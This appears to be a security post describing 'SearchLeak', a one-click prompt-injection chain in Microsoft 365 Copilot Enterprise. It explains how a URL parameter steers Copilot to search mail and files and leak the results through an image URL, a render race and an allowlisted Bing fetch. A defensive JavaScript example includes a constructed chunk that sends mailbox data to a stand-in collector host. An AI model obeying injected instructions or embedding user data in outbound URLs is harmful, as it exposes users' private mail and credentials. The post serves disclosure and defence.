Varonis Threat Labs just exposed SearchLeak.
A three-stage vulnerability chain in Microsoft 365 Copilot Enterprise.
CVE-2026-42824. Maximum severity. Microsoft patched it earlier this month.
Here is how it worked:
An attacker sends you a link. You click it. Copilot Enterprise Search opens.
The URL contains a parameter that Copilot interprets as instructions. It searches your mailbox, your calendar, your OneDrive, your SharePoint.
Then it embeds the stolen data in an image URL. The browser renders the image before Microsoft's sanitizer kicks in. A race condition.
Bing's image search fetches the attacker's URL to analyze the image. CSP is bypassed because Bing is on the allowlist.
Your email subject lines. Your MFA codes. Your meeting notes. Your acquisition plans. All on the attacker's server.
One click. No plugins. No special permissions. The link points to microsoft.com so your anti-phishing tools don't block it.
This is the new attack surface AI created.
Classic bugs — SSRF, HTML injection, race conditions — that were unexploitable before became devastating once prompt injection entered the chain.
If your organization runs M365 Copilot Enterprise, verify your patch status now. Review your CSP allowlists. Treat AI streaming output as untrusted at render time, not as a post-processing step.
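Added example, not Varonis's or Microsoft's code, contrasting the two render orders the post describes: a renderer that sanitizes only once the stream ends has already let the browser fetch the image, while one that sanitizes each chunk at render time never lets it reach the DOM. The allowlist, host names and streamed chunks are constructed placeholders.

```javascript
// Added example, not Varonis's or Microsoft's code. Hypothetical allowlist and
// constructed chunks; markdown ![alt](url) stands in for a chat UI's rich output.
const IMAGE_HOST_ALLOWLIST = new Set(["img.example-tenant.invalid"]);
const MD_IMAGE = /!\[[^\]]*\]\(([^)\s]+)\)/g;

// Policy: https, allowlisted host, no query string or fragment. Leaked data rides
// in the query, and an allowlisted fetch-proxy (the post's Bing image-search case)
// typically takes its target URL there too, so one rule covers both paths.
function imageUrlAllowed(url) {
  let u;
  try { u = new URL(url); } catch { return false; }
  return u.protocol === "https:" && IMAGE_HOST_ALLOWLIST.has(u.hostname)
    && u.search === "" && u.hash === "";
}
// Replace every image that fails the policy and record what was blocked.
function sanitizeChunk(text, blocked) {
  return text.replace(MD_IMAGE, (m, url) =>
    imageUrlAllowed(url) ? m : (blocked.push(url), "[image removed]"));
}

// The pattern the post warns about: chunks hit the DOM as they arrive and the
// sanitizer runs once the stream ends. `fetched` is what the browser had already
// requested by then, even though the final output looks clean.
function renderThenSanitize(chunks) {
  const fetched = new Set(), blocked = [];
  let rendered = "";
  for (const chunk of chunks) {
    rendered += chunk;
    for (const m of rendered.matchAll(MD_IMAGE)) fetched.add(m[1]);
  }
  return { output: sanitizeChunk(rendered, blocked), fetched: [...fetched], blocked };
}
// Render-time sanitization: hold back an unfinished "![" until its ")" arrives,
// sanitize the released text, and only then let it reach the DOM.
function safeStreamRender(chunks) {
  const blocked = [];
  let pending = "", output = "";
  for (const chunk of chunks) {
    pending += chunk;
    const open = pending.lastIndexOf("![");
    const cut = open < 0 || pending.indexOf(")", open) >= 0 ? pending.length : open;
    output += sanitizeChunk(pending.slice(0, cut), blocked);
    pending = pending.slice(cut);
  }
  return { output: output + sanitizeChunk(pending, blocked), blocked };
}
// Constructed stream: an image URL carrying a mailbox subject line arrives split
// across chunks, followed by a legitimate logo.
const SAMPLE_CHUNKS = [
  "Summary of your inbox: ![s",
  "tatus](https://collector.invalid/i.png?d=Q3-acquisition-plan",
  ") and your logo ![logo](https://img.example-tenant.invalid/logo.png)",
];
```

Both renderers produce the same clean final text; only `renderThenSanitize` reports an image URL already fetched before the sanitizer ran, which is the race the post describes.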
The next SearchLeak is already being built.
Enterprise AI Impact
Microsoft 365 Copilot Enterprise had a critical flaw that let attackers steal emails, MFA codes, and SharePoint files with one click. CVE-2026-42824 is patched. Check your tenant today.